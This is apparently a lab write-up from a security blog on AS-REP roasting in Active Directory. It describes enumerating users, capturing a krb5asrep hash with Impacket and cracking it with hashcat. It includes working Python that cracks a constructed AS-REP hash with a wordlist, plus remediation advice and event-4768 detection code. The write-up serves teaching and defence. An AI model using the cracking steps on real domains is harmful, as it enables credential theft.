New World Samurai Exploits

Threat Informed

AS-REP Roasting When Pre-Auth Is Disabled.

AS-REP roasting is an attack on Kerberos that recovers offline-crackable password material for user accounts that have pre-authentication disabled. Pre-authentication is the first step of the Kerberos exchange: before the KDC issues a ticket-granting ticket, the client proves knowledge of the user's key by including a timestamp encrypted with that key in its AS-REQ. If the account has the "Do not require Kerberos preauthentication" flag set, the KDC skips that proof. It accepts a plain AS-REQ that simply names the user and answers with an AS-REP straight away, without having verified anything about who sent the request. Part of that AS-REP (the enc-part) is encrypted with a key derived from the user's password, so anyone who can reach the KDC can collect it and try candidate passwords against it offline, with no lockouts and no failed-logon events. If the password is weak, a dictionary attack recovers it in plain text.

PoC Video

Lab Setup

The Active Directory lab contains one machine:

Note: The build scripts are under Resources at the bottom of this page if you wish to recreate this lab.

Walkthrough

Enumerating users with kerbrute tells you which user accounts exist on the target domain and which of them could potentially be used to gain access to the network. We discover a user account 'reed'.

Kerberos pre-authentication shows as disabled for the account 'reed'. Let's use Impacket's GetNPUsers.py to grab the krb5asrep hash and see whether it can be cracked with the standard rockyou wordlist.

Using hashcat (mode 18200, Kerberos 5 AS-REP etype 23) to crack the hash proves successful, revealing the user's password in plain text.
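To show what the cracking step above actually verifies, here is an added example (not code from the original post, and not Impacket's or hashcat's own code) that re-creates the check hashcat mode 18200 performs on a `$krb5asrep$23$user@REALM:checksum$encdata` line. The NT hash of a candidate password is the RC4-HMAC key; from it the checksum key K1 and the RC4 key K3 are derived, the enc-part is decrypted, and the HMAC-MD5 over the plaintext is compared with the checksum the KDC sent. The sample hash is constructed locally for the account 'reed' in an assumed realm LAB.LOCAL with an assumed weak password, so no KDC is contacted; MD4 is implemented inline because OpenSSL 3 often disables it in hashlib.

```python
"""Offline verification of an AS-REP roasting hash (etype 23, RC4-HMAC).

Added example, not from the original post or from Impacket/hashcat. The realm,
password and enc-part bytes below are constructed for illustration.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (OpenSSL 3 often disables hashlib's md4)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    rounds = (  # (mixing function, round constant, block-word order, shift amounts)
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, w in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[w] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate registers: next op updates the old d
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC (etype 23) Kerberos key is simply the NT hash of the password."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR; used by etype 23 after the HMAC-derived key K3."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _k1(key: bytes) -> bytes:
    # RFC 4757: K1 = HMAC-MD5(K, T). The AS-REP enc-part is key usage 3 in RFC 4120,
    # but RC4-HMAC maps it to T = 8, the same mapping Impacket and hashcat apply.
    return hmac.new(key, struct.pack("<I", 8), hashlib.md5).digest()


def build_asrep_hash(user: str, realm: str, password: str, plaintext: bytes,
                     confounder: bytes = b"\x00" * 8) -> str:
    """Encrypt as the KDC would and emit the line GetNPUsers.py prints."""
    k1 = _k1(nt_hash(password))
    msg = confounder + plaintext             # an 8-byte confounder precedes the EncASRepPart
    checksum = hmac.new(k1, msg, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${rc4(k3, msg).hex()}"


def check_password(hash_line: str, candidate: str) -> bool:
    """True if `candidate` decrypts the enc-part to data matching the KDC's checksum."""
    head, rest = hash_line.split(":", 1)
    if not head.startswith("$krb5asrep$23$"):
        raise ValueError("only etype 23 (RC4-HMAC) hashes are handled here")
    checksum_hex, edata_hex = rest.split("$", 1)
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    k1 = _k1(nt_hash(candidate))
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plaintext = rc4(k3, edata)               # RC4 always "decrypts"; the HMAC is the real test
    return hmac.compare_digest(hmac.new(k1, plaintext, hashlib.md5).digest(), checksum)


def crack(hash_line: str, wordlist):
    """Dictionary attack: first candidate whose NT hash verifies the checksum, else None."""
    return next((w for w in wordlist if check_password(hash_line, w)), None)


# Constructed sample: assumed realm, assumed weak password, placeholder enc-part bytes.
SAMPLE_PLAINTEXT = b"\x79\x81\x22\x30\x81\x1f" + bytes(range(32))
SAMPLE_HASH = build_asrep_hash("reed", "LAB.LOCAL", "Summer2019", SAMPLE_PLAINTEXT)
SAMPLE_WORDLIST = ["123456", "password", "Welcome1", "Summer2019", "letmein"]

if __name__ == "__main__":
    print(SAMPLE_HASH)
    print("cracked:", crack(SAMPLE_HASH, SAMPLE_WORDLIST))
```

Every wrong candidate costs one MD4 plus three HMAC-MD5 and one RC4 pass, which is why a GPU can test hundreds of millions of rockyou entries against a single captured AS-REP in minutes; nothing in the loop touches the domain.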

Resources

If you would like to setup and complete this lab the OVA file can be obtained from my Dropbox share HERE.

Remediation

Audit AD user accounts for the "Do not require Kerberos preauthentication" setting (the DONT_REQ_PREAUTH bit of userAccountControl) and clear it everywhere it is not strictly required; if an application genuinely needs it, give that account a long random password so the captured AS-REP is not crackable. Implement stronger password policies and consider using two-factor authentication. On the detection side, the KDC logs every AS-REQ it answers as Security event 4768; entries with Pre-Authentication Type 0 are the ones served without pre-authentication, and a burst of them from one client address against several accounts is the signature of this attack.
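As an added example of the detection angle (not code from the original post), the function below runs over a handful of constructed Security event 4768 records, shaped like the EventData fields a log shipper would forward, and reports client addresses that obtained AS-REPs without pre-authentication using RC4 (etype 0x17), which is what GetNPUsers.py requests by default. The account names, IP addresses and threshold are assumptions for illustration.

```python
"""AS-REP roasting detection over Security event 4768 (constructed events).

Added example, not from the original post. Field names match the 4768
EventData elements; the records themselves are made up for this demo.
"""
from collections import defaultdict

NO_PREAUTH = "0"      # PreAuthType 0: request was answered without pre-authentication
RC4_HMAC = "0x17"     # TicketEncryptionType 0x17: RC4-HMAC, the etype roasting tools ask for
SUCCESS = "0x0"       # Status 0x0: a TGT (and therefore an enc-part) was actually issued

# Constructed 4768 events: one workstation logging on normally, one host (assumed
# 10.10.10.50) requesting AS-REPs for several accounts without pre-authentication.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:10.10.10.20",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": SUCCESS},
    {"EventID": 4768, "TargetUserName": "reed", "IpAddress": "::ffff:10.10.10.50",
     "PreAuthType": NO_PREAUTH, "TicketEncryptionType": RC4_HMAC, "Status": SUCCESS},
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "::ffff:10.10.10.50",
     "PreAuthType": NO_PREAUTH, "TicketEncryptionType": RC4_HMAC, "Status": SUCCESS},
    {"EventID": 4768, "TargetUserName": "bob", "IpAddress": "::ffff:10.10.10.50",
     "PreAuthType": NO_PREAUTH, "TicketEncryptionType": RC4_HMAC, "Status": "0x12"},
    {"EventID": 4769, "TargetUserName": "alice", "IpAddress": "::ffff:10.10.10.20",
     "PreAuthType": "-", "TicketEncryptionType": "0x12", "Status": SUCCESS},
]


def is_roastable_asrep(ev: dict) -> bool:
    """A 4768 that handed out an RC4-encrypted AS-REP without pre-authentication."""
    return (ev.get("EventID") == 4768
            and ev.get("PreAuthType") == NO_PREAUTH
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and ev.get("Status") == SUCCESS)


def roasted_accounts_by_client(events) -> dict:
    """Map each client address to the sorted set of accounts it roasted."""
    hits = defaultdict(set)
    for ev in events:
        if is_roastable_asrep(ev):
            hits[ev["IpAddress"]].add(ev["TargetUserName"].lower())
    return {ip: sorted(users) for ip, users in hits.items()}


def alerts(events, min_accounts: int = 1) -> list:
    """Clients to alert on; raise min_accounts to ignore a single legacy account."""
    return [(ip, users) for ip, users in roasted_accounts_by_client(events).items()
            if len(users) >= min_accounts]


if __name__ == "__main__":
    for ip, users in alerts(SAMPLE_EVENTS):
        print(f"AS-REP roasting from {ip}: {', '.join(users)}")
```

A single hit can be a legitimately configured legacy account renewing its ticket, so in practice the threshold is tuned to the accounts the audit above found; once the flag is cleared everywhere, any remaining PreAuthType 0 event is itself the finding.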

author: Jeff Griggs